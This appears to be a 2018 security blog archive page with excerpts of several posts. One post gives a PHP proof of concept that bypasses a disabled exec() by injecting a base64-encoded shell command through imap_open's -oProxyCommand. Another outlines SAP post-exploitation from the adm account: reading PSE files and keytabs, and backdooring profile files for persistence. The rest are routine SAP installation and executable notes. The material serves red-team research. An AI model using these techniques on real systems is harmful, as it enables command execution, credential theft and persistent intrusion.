Showing posts from 2018

Bypassing PHP’s Disabled exec()

Source: <?php # # echo ' 1234567890 '>/tmp/test0001 $server = " x -oProxyCommand=echo \t ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64 \t -d|sh} " ; imap_open ( ' { ' . $server . ' :143/imap}INBOX ' , ' ' , ' ' ) or die ( " \n\n Error: " . imap_last_error ()); ?>

SAP Post-Exploitation - One script to 0wn 'em All

The topic here is this: Post-exploitation for SAP systens - not at application level, but at OS level.. Imagine a red-teamer gained acess to a adm user ID. Having SSH or RDP access. Whats next? Well, theres a lot he/sehe can do. adm has the rights to go query DB directly. adm can access userkeystore. adm typically has the rights to read PSE files and keytabs. adm typically can access /sapmnt/trans of other SID within the landscape. adm can aslo access profiles, DEFAULT.PFL, etc, and insert a command line backdoor that will restart each time the application starts. Watch this space. Am developing that script. :) ============================= SECTION 1: The Possible Probe Points ============================= - Get the SID via /etc/passwd or net users or service query or current user - Identify possible PSE file location - identfiy any possible cert dumps to get p12 format - identify DB and kernel version - identify connectivity and userstore - R3trans or sqlplus or hd

SAP SWPM Software Provision Manager SL Toolset 1.0 SP22 Startup Options

This is just a rough note on the options and properties we can set upon running apinst when installing a SAP system. Version: [root@host SWPM]# ./sapinst -v [==============================] - extracting...  done! INFO       2018-04-19 11:54:56.315 (mainThread) [sixxcreate.cpp:346] ******************************************************************************** Initial log directory: /root/.sapinst/ ******************************************************************************** SAPinst build information: -------------------------- Version:         749.0.47 Build:           1832063 Compile time:    Mar 27 2018 - 13:22:27 Make type:       optU Codeline:        749_REL Platform:        linuxx86_64 Kernel build:    749, patch 426, changelist 1830485 SAP JRE build:   SAP Java Server VM (build 8.1.037 9.0.4+011, Feb 27 2018 15:45:47 - 81_REL - optU - linux amd64 - 6 - bas2:302122 (mixed mode)) SAP JCo build:   3.0.17 SL-UI version:   2

Full Description of SAP Executable (Kernel Components, etc.)

A direct rip from: Thanks Amit Gupta ! Here is List of SAP executable that you may find on your SAP systems. If you know of SAP executables “*.exe” files missing in from list, please leave a comment: R3check            This is a tool that can check Cluster-Tables for errors. R3ldctl                           The tool for exporting all table structures to the file system during an OS/DB-Migration. R3load                           The table import & export tool of SAP during Installation, Upgrade and Migration. R3szchk                         The tool for determine the sizes of the different tables in the target database during the import in an OS/DB-Migration. R3ta                               Split large tables for export and import R3trans                          This is the tool, which does the real work for tp, tp controls the import and export of changes and R3tran